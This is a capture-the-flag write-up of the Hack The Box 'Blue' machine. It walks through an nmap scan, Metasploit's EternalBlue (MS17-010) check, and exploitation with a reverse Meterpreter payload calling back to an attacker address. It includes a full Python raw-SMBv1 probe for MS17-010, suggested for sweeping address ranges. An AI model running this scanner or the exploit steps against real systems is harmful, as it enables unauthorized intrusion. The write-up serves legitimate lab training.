Blue - HTB

Enumeration

Starting with a port scan, we can observe that we are dealing with a Windows machine: SMB is exposed on 139/445 with a "Windows 7 - 10" banner and no other services, which makes it a likely candidate for the notorious EternalBlue (MS17-010) SMBv1 bug. Note that this is an unprivileged connect scan of nmap's default top 1000 ports, so higher ports beyond the RPC range shown would need a full-range scan.

 nmap -sV 10.10.10.40
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-01 08:39 CEST
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 33.33% done; ETC: 08:40 (0:00:42 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.029s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.31 seconds

Exploitation

An unpatched-looking Windows 7 host with SMB exposed makes checking for the EternalBlue (MS17-010) vulnerability with Metasploit a no-brainer: the framework ships both a scanner and an exploit module for it.

I'm going to use the windows/smb/ms17_010_eternalblue exploit with RHOSTS set to 10.10.10.40 and LHOST set to 10.10.14.6 (the attacker address the reverse payload connects back to).

Running check against the target before firing the exploit confirms the suspicion; the module delegates the check to the auxiliary/scanner/smb/smb_ms17_010 scanner, which also fingerprints the OS build:

msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
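What that check actually does on the wire is worth seeing, since it is a safe probe you can run without Metasploit. The following is an added example written for this writeup, not the page's own code and not the Metasploit module: it sends the same SMBv1 sequence the smb_ms17_010 scanner uses (Negotiate, anonymous Session Setup, Tree Connect to IPC$, then a TRANS_PEEK_NMPIPE transaction with FID 0) and classifies the host by the NT status it returns. Field layouts follow the public SMBv1 ([MS-CIFS]) format; the PID/MID values are arbitrary, and the sample_response() bytes are constructed for offline testing rather than captured from the box.

```python
"""Raw SMBv1 MS17-010 probe: the same test Metasploit's smb_ms17_010 scanner runs.

Added example (not the page's code, not the Metasploit module). An unpatched
srv.sys answers the FID-0 PeekNamedPipe with STATUS_INSUFF_SERVER_RESOURCES;
a patched host answers STATUS_ACCESS_DENIED or STATUS_INVALID_HANDLE.
"""
import socket
import struct
import sys

STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205  # vulnerable
STATUS_ACCESS_DENIED = 0xC0000022            # patched
STATUS_INVALID_HANDLE = 0xC0000008           # patched
SMB_COM_TRANSACTION, SMB_COM_NEGOTIATE = 0x25, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75
TRANS_PEEK_NMPIPE = 0x23


def netbios(payload):
    """NetBIOS session-service framing: type 0 + 24-bit big-endian length."""
    return b"\x00" + struct.pack(">I", len(payload))[1:] + payload


def smb_header(command, tid=0, uid=0, flags2=0x2001, status=0):
    """32-byte SMBv1 header. Flags 0x18: canonical, case-insensitive paths.
    Flags2 0x2001: NT status + long names; 0x2801 also offers extended security.
    PID 0x4B2F / MID 0x5EC5 are arbitrary."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, status, 0x18,
                       flags2, 0, b"\x00" * 8, 0, tid, 0x4B2F, uid, 0x5EC5)


def build_negotiate():
    dialects = b"".join(b"\x02" + d + b"\x00" for d in
                        (b"LANMAN1.0", b"LM1.2X002", b"NT LANMAN 1.0", b"NT LM 0.12"))
    body = struct.pack("<BH", 0, len(dialects)) + dialects  # WordCount 0, ByteCount
    return netbios(smb_header(SMB_COM_NEGOTIATE, flags2=0x2801) + body)


def build_session_setup():
    """Anonymous (null) session: both password lengths are zero."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xFFDF, 2, 1, 0, 0, 0, 0, 0x40)
    data = b"\x00" + b".\x00" + b"Windows 2000 2195\x00" + b"Windows 2000 5.0\x00"
    body = struct.pack("<B", 13) + words + struct.pack("<H", len(data)) + data
    return netbios(smb_header(SMB_COM_SESSION_SETUP_ANDX) + body)


def build_tree_connect(ip, uid):
    path = ("\\\\%s\\IPC$" % ip).encode() + b"\x00"
    data = b"\x00" + path + b"?????\x00"            # password "", path, service "?????"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)  # AndX none, PasswordLength 1
    body = struct.pack("<B", 4) + words + struct.pack("<H", len(data)) + data
    return netbios(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + body)


def build_peek_named_pipe(tid, uid):
    """SMB_COM_TRANSACTION, Setup = [TRANS_PEEK_NMPIPE, FID 0]: the bogus handle
    whose error code differs between patched and unpatched srv.sys."""
    name = b"\\PIPE\\\x00"
    offset = 32 + 1 + 32 + 2 + len(name)  # parameter/data offset: just past the name
    words = struct.pack("<HHHHBBHIHHHHHBBHH", 0, 0, 0xFFFF, 0xFFFF, 0, 0, 0, 0, 0,
                        0, offset, 0, offset, 2, 0, TRANS_PEEK_NMPIPE, 0)
    body = struct.pack("<B", 16) + words + struct.pack("<H", len(name)) + name
    return netbios(smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid) + body)


def parse_status(raw):
    """NT status from a NetBIOS-framed SMBv1 response (header offset 5)."""
    if len(raw) < 36 or raw[4:8] != b"\xffSMB":
        raise ValueError("not an SMBv1 response")
    return struct.unpack_from("<I", raw, 4 + 5)[0]


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE"
    if status in (STATUS_ACCESS_DENIED, STATUS_INVALID_HANDLE):
        return "PATCHED"
    return "UNKNOWN"


def sample_response(status):
    """Constructed (not captured) Transaction error response for offline tests."""
    hdr = smb_header(SMB_COM_TRANSACTION, tid=0x800, uid=0x800, status=status)
    return netbios(hdr + b"\x00\x00\x00")  # WordCount 0, ByteCount 0


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed connection")
        buf += chunk
    return buf


def _recv_smb(sock):
    hdr = _recv_exact(sock, 4)
    return hdr + _recv_exact(sock, struct.unpack(">I", b"\x00" + hdr[1:])[0])


def check_host(ip, port=445, timeout=5.0):
    """Live probe; returns VULNERABLE / PATCHED / UNKNOWN (UNKNOWN also covers
    hosts that refuse the null session or the IPC$ tree connect)."""
    with socket.create_connection((ip, port), timeout=timeout) as s:
        s.sendall(build_negotiate())
        _recv_smb(s)
        s.sendall(build_session_setup())
        r = _recv_smb(s)
        if parse_status(r) != 0:
            return "UNKNOWN"
        uid = struct.unpack_from("<H", r, 4 + 28)[0]   # UID field of the header
        s.sendall(build_tree_connect(ip, uid))
        r = _recv_smb(s)
        if parse_status(r) != 0:
            return "UNKNOWN"
        tid = struct.unpack_from("<H", r, 4 + 24)[0]   # TID field of the header
        s.sendall(build_peek_named_pipe(tid, uid))
        return classify(parse_status(_recv_smb(s)))


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.10.40"
    print(target, check_host(target))
```

Run it as `python3 ms17_010_check.py 10.10.10.40` (file name assumed). The probe never sends an exploit buffer: it only opens a null session and asks about a pipe handle that does not exist, so it is as safe as the Metasploit check and suitable for sweeping a range before deciding what to exploit.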

Running the exploit gives us a Meterpreter session on the target. Because the bug is in the kernel-mode SMB server (srv.sys), the session comes back as NT AUTHORITY\SYSTEM, so no privilege escalation step is needed on this box.

A non-default directory beneath C:\Users is haris, matching the hostname HARIS-PC that nmap reported in its Service Info line, so that user's profile is the obvious place to look first.

After some traversing, we find the user.txt flag on that user's Desktop (C:\Users\haris\Desktop).

By the same logic, root.txt sits on the Administrator user's Desktop (C:\Users\Administrator\Desktop), which the SYSTEM-level shell can read directly.